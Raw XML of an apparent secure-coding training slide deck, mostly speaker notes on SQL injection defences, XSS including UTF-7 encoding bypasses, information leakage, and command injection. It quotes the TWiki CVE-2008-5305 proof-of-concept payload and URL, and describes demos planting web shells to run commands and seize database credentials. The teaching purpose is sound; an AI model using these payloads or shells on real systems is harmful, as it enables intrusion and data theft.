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76" r:id="rId3"/>
    <p:sldId id="280" r:id="rId4"/>
    <p:sldId id="281" r:id="rId5"/>
    <p:sldId id="282" r:id="rId6"/>
    <p:sldId id="318" r:id="rId7"/>
    <p:sldId id="319" r:id="rId8"/>
    <p:sldId id="320" r:id="rId9"/>
    <p:sldId id="283" r:id="rId10"/>
    <p:sldId id="284" r:id="rId11"/>
    <p:sldId id="285" r:id="rId12"/>
    <p:sldId id="286" r:id="rId13"/>
    <p:sldId id="287" r:id="rId14"/>
    <p:sldId id="288" r:id="rId15"/>
    <p:sldId id="321" r:id="rId16"/>
    <p:sldId id="289" r:id="rId17"/>
    <p:sldId id="290" r:id="rId18"/>
    <p:sldId id="291" r:id="rId19"/>
    <p:sldId id="292" r:id="rId20"/>
    <p:sldId id="293" r:id="rId21"/>
    <p:sldId id="294" r:id="rId22"/>
    <p:sldId id="322" r:id="rId23"/>
    <p:sldId id="295" r:id="rId24"/>
    <p:sldId id="296" r:id="rId25"/>
    <p:sldId id="297" r:id="rId26"/>
    <p:sldId id="298" r:id="rId27"/>
    <p:sldId id="299" r:id="rId28"/>
    <p:sldId id="323"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24" r:id="rId4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0B8"/>
    <a:srgbClr val="EE8E2E"/>
    <a:srgbClr val="EC8218"/>
    <a:srgbClr val="CC66FF"/>
    <a:srgbClr val="CCFF66"/>
    <a:srgbClr val="1C0FC1"/>
    <a:srgbClr val="FF6600"/>
    <a:srgbClr val="D05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42" autoAdjust="0"/>
    <p:restoredTop sz="84636" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="101" d="100"/>
          <a:sy n="101" d="100"/>
        </p:scale>
        <p:origin x="-1818"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3ACCAFD-2A1C-4A09-9BEF-F1C7F8BDE032}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>13.10.2017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62ACF8EA-F639-4594-A7E1-1AFA9F3543FD}" type="slidenum">
              <a:rPr lang="ru-RU"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3779442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1BA9742-3509-43B8-ADF4-F4C7C0078F31}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>13.10.2017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B93B0763-A673-4EA1-86C2-28A135B3362E}" type="slidenum">
              <a:rPr lang="ru-RU"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3361003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google.com/url?q="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en.wikipedia.org/wiki/Cross-site_scripting" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Internet_Explor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p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1433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dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143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0873C8-7CED-41CB-AAFD-9EE6198D58AE}"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that even a very basic validation ensuring that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> number was supplied would have worked here.  If you look at the two parameters (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>pageNav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and page) both appear to be only numeric.</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To properly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> protect our code from SQL injection, we should take a defense-in-depth approach.  First, we should perform some basic validation related to the type of information we expect.  In this case we are working with a username.  It is probably safe to assume that a username should be less than 100 characters long, so we should verify that input conforms to this.  Next we should use a whitelist if possible to restrict the input to a set of valid characters.  For most of us, all our usernames are just characters so maybe it is correct to only allow characters in our input string.  Finally, we should use prepared statements instead of directly concatenating the input with the SQL query.  Using prepared statements automatically enforces that a data field will be just a data field and will not allow an attacker to single-tic their way out of the field and inject additional commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Note that escaping the single tic would be a start, but this might not be enough.  This is in a form of blacklisting where we try to exclude certain characters.  The problem is that different character encodings may be possible that could pass the blacklist but still be interpreted as a single tic.  For example, x027 is the hex value for the single tic.</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Persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> XSS vs. R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>eflected XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Persistent = a malicious site or a malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> post, get user to visit the site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Reflected = find a vulnerable site that "reflects back" the values in the URL, send the code as part of the phishing URL and get the user to click the link, the "trusted" server reflects back the code that is then rendered/run in the user's browser.</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aseline="0" dirty="0" smtClean="0"/>
              <a:t>Demo a simple XSS attack.  This can either be done directly from the login page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> field or can be done leveraging the Tamper Data interface.  Pop a simple alert window to demonstrate how the data provided as input is being interpreted by the browser as code from the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Discuss how the actual attack will be much worse in reality.  Low-end hacktivists &amp; script kiddies might settle for apparent site defacement or misleading data being provided on the page.  Cyber criminals can use the attack to provide misleading information (bogus AV software alerts for example).  Some cyber criminals and advanced threats may leverage this weakness to steal/harvest session identifiers for your site or to cause a cross-site request forgery (CSRF).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="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 XSS vulnerabilities was identified in the Google.com website, which allowed an attacker to mount a phishing attack. Although Google uses common XSS countermeasures, a successful attack is possible, when using UTF-7 encoded payloads. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The script (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.google.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>url?q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>...) is normally used for redirecting the browser from Google's website to other sites.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When requesting a page which doesn't exist under www.google.com, a 404 NOT FOUND response is returned to the user, with the original path requested. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>While the aforementioned mechanisms (URL redirection script, 404 NOT FOUND) escape common characters used for XSS, such as &lt;&gt; (triangular parenthesis) and apostrophes, it fails to handle hazardous UTF-7 encoded payloads.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server response lacks charset encoding enforcement, such as:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Response headers: "Content-Type: text/html; charset=[encoding]".</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Therefore, when sending an XSS attack payload, encoded in UTF-7, the payload will return in the response without being altered. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If "Encoding" is set to "Auto-Select", and Internet-Explorer finds a UTF-7 string in the first 4096 characters of the response's body, it will set the charset encoding to UTF-7 automatically, unless a certain charset encoding is already enforced.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>UTF-7 allows multiple representations of the same source string. In particular ASCII characters can be represented as part of Unicode blocks. As such if standard ASCII based escaping or validation processes are used on UTF-7 then Unicode blocks may be used to slip malicious strings past them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Older versions of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinkfile" tooltip="Internet Explorer"/>
              </a:rPr>
              <a:t>Internet Explorer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> can be tricked into interpreting the page as UTF-7. This can be used for a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId5" action="ppaction://hlinkfile" tooltip="Cross-site scripting"/>
              </a:rPr>
              <a:t>cross-site scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> attack as the &lt; and &gt; marks can be encoded as +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>ADw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>- and +AD4- in UTF-7, which most validators let through as simple text.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>The sample PHP code show how this works.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>  The sample page defines the content type as UTF-7 and then creates a UTF-7 string that contains the payload.  HTML encoding is then performed to remove XSS specific characters, but the encoding is done on UTF-8 characters.  The end results is that the string is not properly encoded and the payload is delivered to the user's browser.  The browser see the UTF-7 content type and renders the page accordingly, enabling the attack.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>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Demo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> – Show looking at the status functionality in the site.  Show an attempt to ‘fuzz’ the ‘check’ name/value pair using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>TamperData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>.  Use a string like ‘”&lt;&gt;;:%.  The error message returned gives the hint that this is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> statement that caused the error.  Mention that at this point it’s just trial and error until you perfect your payload.  Cut &amp; paste over a prepared malicious payload from the eval-attack.txt file.  The first one is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>f.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> which will allow command execution via the “c” name/value pair.  The second is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>d.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> which also uses the “c” name/value pair to execute DB commands in the application database.  Using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>f.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, you can do a ls –l, show finding the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>authenticate.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> source, then using that to identify the file that the DB connection information is coming from along with the ID &amp; password.  Then upload the 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> file to take advantage of that to gain full access to the DB.</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Perl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>backtick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> runs a command and returns the command's output (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>  For example … </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>print `perl -le "print -t STDOUT"`… This prints the output of the command …</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>perl -le "print -t STDOUT" …</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> This is very similar to the perl system() function, however system() returns a status code, not stdout.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>From http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2008-5305 …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>The %SEARCH{}% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>TWiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> variable or a specially crafted GET URL enables a malicious user to compose a command line executed by the Perl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>backtick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> (``) operator. User input is passed to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>" command without first being sanitized.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>If access to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>TWiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> is not restricted by other means, attackers can use the SEARCH variable with or without prior authentication, depending on the configuration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Proof of concept:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Enter the following in the search box:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>%SEARCH{ date="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>P`pr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> -?`" search="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>xyzzy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>" }%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Or use a GET URL like:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>http://example.org/twiki/bin/view/Main/WebSearch?search=%25SEARCH%7Bdate%3D%22P%60pr+-%3F%60%22+search%3D%22xyzzy%22%7D%25&amp;scope=all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Afterwards, evidence of command execution can be seen in the webserver's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>error_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>[Thu Sep 11 22:13:36 2008] [error] [client 127.0.0.1] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>pr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>: invalid option -- ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>[Thu Sep 11 22:13:36 2008] [error] [client 127.0.0.1] Try `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>pr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> --help' for more information.</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Issues in old code still being discovered.  Released announcement on Full Disclosure mailing list on 2/14/11,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>about a new zero-day in Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Server 2003 and XP SP3.</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four words to live by for Data Validation.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>  These align to the four big vulnerabilities that we see today: SQL injection, cross-site scripting, command injection, and buffer overflows.</a:t>
            </a:r>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These are examples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> we’ve already seen as we’ve been working through the site.  The first provides names &amp; account name combinations, and talks about upcoming changes to the code…why do the users need to see this?  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The second example shows a bad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> vs. a bad password.  This can be used to harvest possible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> values.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Third example – Just the concept of confirming valid server, files, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> connections to a normal user of an application is rather strange.  Users don’t need to know that kind of operational detail, and providing it to users just makes an attacker’s job easier to understand what impact his attacks might be having.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Final example – returning a coding related error message (see also – stack traces in Java &amp; such) to the browser/user.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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is an e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>xample of a real error page posted on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the web from a IIS / MS .NET application.  Large amounts of information leakage are shown here.  The example shows information about DB table structure (notably the account table), includes a source code snippet which helpfully shows that the site is likely vulnerable to SQL Injection, shows the application as being installed on the C: drive in the default location which will be helpful if successful in attacking the application, and includes version numbers of the server install of the .NET framework &amp; ASP.NET software.  This is really useful for a developer during debugging… but a field day for a malicious attacker.</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Minimum Balance – This is a business logic decision, not a security one.  Telling people exactly what qualifies them to be able to partak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>e in various business functions or options is not an information leakage problem.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Password length – This is not an information leak issue, though this can depend somewhat on where in the application this is provided and under what circumstances.  The password length requirement must be told to users during the account creation process.  Likely valid to report to users via client side checking in a web application to prevent a typo causing an invalid login for a user.  However, it would need to be verified that the password error handling on the server wasn’t causing different errors in the case of an invalid login vs. invalid password on the server from this message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>DV fail requirements – not an information leak.  An attacker is already going to be able to harvest this information via brute-force methods… why irritate/annoy legitimate users who are trying to do the right thing with a cryptic error that doesn’t help them use your application successfully?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>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41</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42</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43</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44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aseline="0" dirty="0" smtClean="0"/>
              <a:t>Demo a very simple SQL Injection vector via the login page.  The attack will inject the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> field, causing the SQL statement to return all users from the user table back to the command.  The program just reads the first line returned from the DB, not checking if there was more than one match, and assumes the user must have logged in successfully (user &amp; password provided must have matched).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Explain that this is an extremely simple case to illustrate the coding weakness. There are much more sophisticated versions of this attack, leveraging UNION statements to map table structure and return additional information as well as Blind SQL Injection to return information from the DB even when the query might never normally return any data to the client.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Номер слайда 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
